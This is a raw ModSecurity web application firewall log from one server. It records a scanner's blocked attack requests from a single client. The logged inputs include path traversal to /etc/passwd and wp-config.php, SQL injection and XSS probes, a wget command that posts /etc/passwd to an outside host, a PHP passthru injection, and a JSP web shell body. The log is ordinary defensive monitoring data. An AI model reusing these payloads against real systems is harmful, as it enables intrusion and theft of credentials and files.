[unique_id "ZO14R8Co-f0AAAjN0RYAAAAU"]
[Tue Aug 29 11:47:05.408855 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:filename: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/download"] [unique_id "ZO14ScCo-f0AAAjM7C8AAAAT"]
[Tue Aug 29 11:47:06.359758 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Rule 7fe1c6360a88 [id "981242"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "237"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilib.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAh130AAAAAz"]
[Tue Aug 29 11:47:06.359833 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilib.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAh130AAAAAz"]
[Tue Aug 29 11:47:07.436010 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:name[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:name[]: $(wget --post-file /etc/passwd cjmnbitjmimt14dgn26gt6ttoc4g4hcdr.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/api/getServices"] [unique_id "ZO14S8Co-f0AAAjKyvkAAAAQ"]
[Tue Aug 29 11:47:07.767081 2023] [:error] [pid 2282] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:open. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:open: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php"] [unique_id "ZO14S8Co-f0AAAjqDDQAAAAH"]
[Tue Aug 29 11:47:10.436373 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:value: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/api/change_setting"] [unique_id "ZO14TsCo-f0AAAjIhn0AAAAJ"]
[Tue Aug 29 11:47:11.525083 2023] [:error] [pid 2276] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../ found within ARGS:fn: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/cs/career/getSurvey.jsp"] [unique_id "ZO14T8Co-f0AAAjkM10AAAAI"]
[Tue Aug 29 11:47:13.380928 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:libpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:libpath: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/sniplets/modules/syntax_highlight.php"] [unique_id "ZO14UcCo-f0AAAjL8TMAAAAR"]
[Tue Aug 29 11:47:14.365655 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14UsCo-f0AAAjCbEwAAAAB"]
[Tue Aug 29 11:47:15.499186 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 6' UNION ALL SELECT md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/admin/requests/take_action.php"] [unique_id "ZO14U8Co-f0AAAjdQM4AAAAZ"]
[Tue Aug 29 11:47:15.932696 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14U8Co-f0AAAjIhocAAAAJ"]
[Tue Aug 29 11:47:16.407711 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,2,3,4,5,6,md5(999999999),8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/admin/manage_booking.php"] [unique_id "ZO14VMCo-f0AAAhl0HsAAAAi"]
[Tue Aug 29 11:47:18.451081 2023] [:error] [pid 2302] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14VsCo-f0AAAj@-twAAAAI"]
[Tue Aug 29 11:47:19.376091 2023] [:error] [pid 2302] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dt: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cWindows\\x5c\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/XmlPeek.aspx"] [unique_id "ZO14V8Co-f0AAAj@-uIAAAAI"]
[Tue Aug 29 11:47:19.556786 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: Banking' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,md5(999999999),15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14V8Co-f0AAAjdQNYAAAAZ"]
[Tue Aug 29 11:47:22.368380 2023] [:error] [pid 2305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{alert(document.domain)}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS_NAMES:{alert(document.domain)}: {alert(document.domain)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO14WsCo-f0AAAkBKlQAAAAb"]
[Tue Aug 29 11:47:23.499568 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/index.action"] [unique_id "ZO14W8Co-f0AAAjIhpQAAAAJ"]
[Tue Aug 29 11:47:25.379242 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XcCo-f0AAAjL8T0AAAAR"]
[Tue Aug 29 11:47:25.455125 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:file: /../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/components/com_moofaq/includes/file_includer.php"] [unique_id "ZO14XcCo-f0AAAj1144AAAAa"]
[Tue Aug 29 11:47:26.368544 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/content/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XsCo-f0AAAjL8UMAAAAR"]
[Tue Aug 29 11:47:27.410364 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ff. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ff: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/knews/wysiwyg/fontpicker/"] [unique_id "ZO14X8Co-f0AAAkAL6gAAAAU"]
[Tue Aug 29 11:47:31.420983 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:wp_abspath: ../../../wp-config.php\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO14Y8Co-f0AAAhl0JgAAAAi"]
[Tue Aug 29 11:47:32.855112 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:FILECAMERA. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:FILECAMERA: ../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/cgi-bin/wapopen"] [unique_id "ZO14ZMCo-f0AAAjW9D0AAAAA"]
[Tue Aug 29 11:47:34.672717 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:id: 1/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/fetchBody"] [unique_id "ZO14ZsCo-f0AAAjCbIMAAAAB"]
[Tue Aug 29 11:47:36.811138 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14aMCo-f0AAAjCbJcAAAAB"]
[Tue Aug 29 11:47:37.456264 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:car_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:car_id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/booking.php"] [unique_id "ZO14acCo-f0AAAkNPlkAAAAI"]
[Tue Aug 29 11:47:39.428423 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DB_DATABASE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');/* found within ARGS:DB_DATABASE: ');passthru('cat /etc/passwd');/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/install/install.php"] [unique_id "ZO14a8Co-f0AAAjbw10AAAAW"]
[Tue Aug 29 11:47:40.375736 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilib.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAjbw14AAAAW"]
[Tue Aug 29 11:47:40.390992 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilib.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAjbw14AAAAW"]
[Tue Aug 29 11:47:41.368289 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilib.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bcCo-f0AAAi2yJsAAAAN"]
[Tue Aug 29 11:47:41.377030 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilib.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bcCo-f0AAAi2yJsAAAAN"]
[Tue Aug 29 11:47:41.638796 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bcCo-f0AAAfECFkAAAAO"]
[Tue Aug 29 11:47:42.531284 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bsCo-f0AAAj118AAAAAa"]
[Tue Aug 29 11:47:43.548378 2023] [:error] [pid 2245] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/templates/default/html/windows/right.php"] [unique_id "ZO14b8Co-f0AAAjFoe8AAAAF"]
[Tue Aug 29 11:47:43.737150 2023] [:error] [pid 2305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') OR true-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14b8Co-f0AAAkBKnYAAAAb"]
[Tue Aug 29 11:47:44.526478 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') AND false-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14cMCo-f0AAAjbw2cAAAAW"]
[Tue Aug 29 11:47:46.488802 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<%@ page import. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .*\\x22%>\\x0d\\x0a<%\\x0d\\x0a found within ARGS:<%@ page import: \\x22java.util.*,java.io.*\\x22%>\\x0d\\x0a<%\\x0d\\x0aif (request.getParameter(\\x22cmd\\x22) != null) {\\x0d\\x0a        out.println(\\x22Command: \\x22   request.getParameter(\\x22cmd\\x22)   \\x22<BR>\\x22);\\x0d\\x0a        Process p = Runtime.getRuntime().exec(request.getParameter(\\x22cmd\\x22));\\x0d\\x0a        OutputStream os = p.getOutputStream();\\x0d\\x0a        InputStream in = p.getInputStream();\\x0d\\x0a        DataInputStream dis = new D..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/poc.jsp/"] [unique_id "ZO14csCo-f0AAAkaC@QAAAAJ"]
